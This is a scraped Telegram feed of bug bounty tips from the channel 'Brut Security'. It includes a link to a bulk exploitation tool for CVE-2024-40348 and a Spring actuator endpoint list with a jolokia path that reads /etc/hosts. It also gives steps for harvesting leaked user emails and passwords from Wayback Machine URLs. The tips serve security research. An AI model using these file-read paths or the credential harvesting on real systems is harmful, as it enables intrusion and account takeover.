Do Sign Up for Top Notch Results π
Please open Telegram to view this post
VIEW IN TELEGRAM
Drop Your Suggestions for Resources
Please open Telegram to view this post
VIEW IN TELEGRAM
π€£6π2π1
This media is not supported in your browser
VIEW IN TELEGRAM
BBRF-Client: The Bug Bounty Reconnaissance Framework (BBRF) can help you coordinate your reconnaissance workflows across multiple devices.
π https://github.com/honoki/bbrf-client/
Please open Telegram to view this post
VIEW IN TELEGRAM
π2π1
IDOR in Reset Password
When the user reset his password the application make an API request to make sure that username exists. If exist, it will come back with Personal Identifying Information (PII) in the response [Full name,Email,Phone number].
By:@Maakthon
#bugbountytips
When the user reset his password the application make an API request to make sure that username exists. If exist, it will come back with Personal Identifying Information (PII) in the response [Full name,Email,Phone number].
By:@Maakthon
#bugbountytips
β€11π4
π¨ CVE-2024-40348 π¨
π This is a bulk scanning and exploitation tool for CVE-2024-40348: Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. This vulnerability was discovered by 4rdr.
π Download : https://github.com/bigb0x/CVE-2024-40348
π This is a bulk scanning and exploitation tool for CVE-2024-40348: Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. This vulnerability was discovered by 4rdr.
π Download : https://github.com/bigb0x/CVE-2024-40348
π₯2β€1
Please open Telegram to view this post
VIEW IN TELEGRAM
Ko-fi
Buy Brut Security a Coffee
Become a supporter of Brut Security today!
β€2π€1
Brut Security pinned Β«π€© Hey everyone, thanks for being part of this awesome community! πΈ If you enjoy my content and want to support me, you can buy me a coffee on Ko-fi: https://ko-fi.com/brutxninja βοΈ !Β»
Please open Telegram to view this post
VIEW IN TELEGRAM
Ko-fi
A Practical Guide to Starting Your Cybersecurity Career in India
Brut Security published a post on Ko-fi
β€1
actuator/env
actuator/auditevents
actuator/beans
actuator/caches
actuator/configprops
actuator/health
actuator/heapdump
actuator/info
actuator/integrationgraph
actuator/configprops
actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/hosts
#bugbountytip #bugbountytips #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
π3
If your input causes a server error (e.g. 500) when you inject a ' (for eg) but you don't get reliable results using boolean inferential injections, try these payloads which should trigger the 500 when the red condition is true.
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯2
Permission Model Issues: $3,000,000 methodology
https://forums.cybershieldctf.com/showthread.php?tid=87
https://forums.cybershieldctf.com/showthread.php?tid=87
New VDP Program - https://www.sonova.com/.well-known/security.txt
π₯1
While testing the site I found the registration OTP bypass error which lead to create new accounts
without verifying them and can generate different account from different number unlimited times.
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
#2 OTP Bypass | Response Manipulation | Bug Bounty POC | CyberTron | #bugbounty #cybersecurity
Bug Type - Improper Authentication β Generic CWE-287
## Summary:
While testing the site I found the registration OTP bypass error which lead to create new accounts
without verifying them and can generate different account from different number unlimitedβ¦
## Summary:
While testing the site I found the registration OTP bypass error which lead to create new accounts
without verifying them and can generate different account from different number unlimitedβ¦
π2β€1π1
Easy Account Take Over
1.Go to http://web.archive.org
2. Put the domain and search for urls
3. Type in the filter ( %40 ) and search
4. Get a lot of urls that have a parameter leaks the email and password of the users
By: @Sayed_v2
#BugBounty #bugbountytips
1.Go to http://web.archive.org
2. Put the domain and search for urls
3. Type in the filter ( %40 ) and search
4. Get a lot of urls that have a parameter leaks the email and password of the users
By: @Sayed_v2
#BugBounty #bugbountytips
π₯11π3